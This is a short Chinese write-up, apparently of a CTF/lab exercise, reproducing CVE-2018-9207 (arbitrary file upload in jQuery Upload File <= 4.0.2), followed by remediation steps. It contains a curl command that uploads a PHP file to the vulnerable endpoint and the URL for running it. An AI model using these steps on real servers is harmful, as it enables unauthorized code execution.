jquery 文件上传 (CVE-2018-9207)漏洞复现

0x01 漏洞描述

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Upload File <= 4.0.2 中的任意文件上传 根目录下/jquery-upload-file

0x02 影响范围

<= 4.0.2

0x03 漏洞复现

1、进入的页面

2、准备一个 php 文件

php 复制代码
<?php phpinfo(); ?>

3、通过虚拟机上传(把文件放进虚拟机里,并执行以下命令)

bash 复制代码
curl -F "myfile=@sh.php" "http://ip:端口/jquery-upload-file/php/upload.php"

4、浏览器访问路径

http://ip:port/jquery-upload-file/php/uploads/sh.php

Ctrl + F 搜 flag 关键字,即可获得 flag

0x04 漏洞修复

升级 jQuery File Upload 到官方安全版本(推荐 10.x 或至少 9.22.1+)

删除或禁用官方 demo 中不安全的上传处理代码(如 server/php/)

服务端限制上传文件类型,禁止上传可执行脚本(如 .php, .jsp 等)

上传接口必须设置身份认证或权限控制,禁止未授权访问

相关推荐
apihz14 小时前
全球域名 WHOIS 信息实时查询免费 API 接口教程,支持1000+后缀
android·网络·网络协议·tcp/ip·apache·域名·whois
她说..2 天前
Apache Commons Lang3 Pair 完整版实战详解
java·spring·java-ee·apache·springboot
Chengbei112 天前
VMware Workstation Pro 26H1免费虚拟化利器
运维·安全·web安全·自动化·系统安全·apache·安全架构
充钱大佬3 天前
Python测试基础教程
python·log4j·apache
SelectDB技术团队4 天前
Agent 场景动态 JSON 性能拆解:Apache Doris 比 ClickHouse 快 7 倍、比 Elasticsearch 快 2 倍
数据库·clickhouse·elasticsearch·json·apache·日志分析·apache doris
DolphinScheduler社区4 天前
Apache DolphinScheduler 6 月治理优化,补齐调度运维全链路细节
大数据·运维·云原生·apache·海豚调度
SelectDB技术团队4 天前
AB 实验指标计算场景:Apache Doris / SelectDB 的技术能力、选型对比与实践
大数据·数据库·数据分析·apache·用户运营·apache doris·selectdb
weixin_440058315 天前
2026知识付费小程序:年费全包零抽成,录播题库全功能覆盖
小程序·apache·小程序开发
Apache Flink6 天前
从结构化到多模态:Apache Flink,多模态数据处理的流式底座
大数据·flink·apache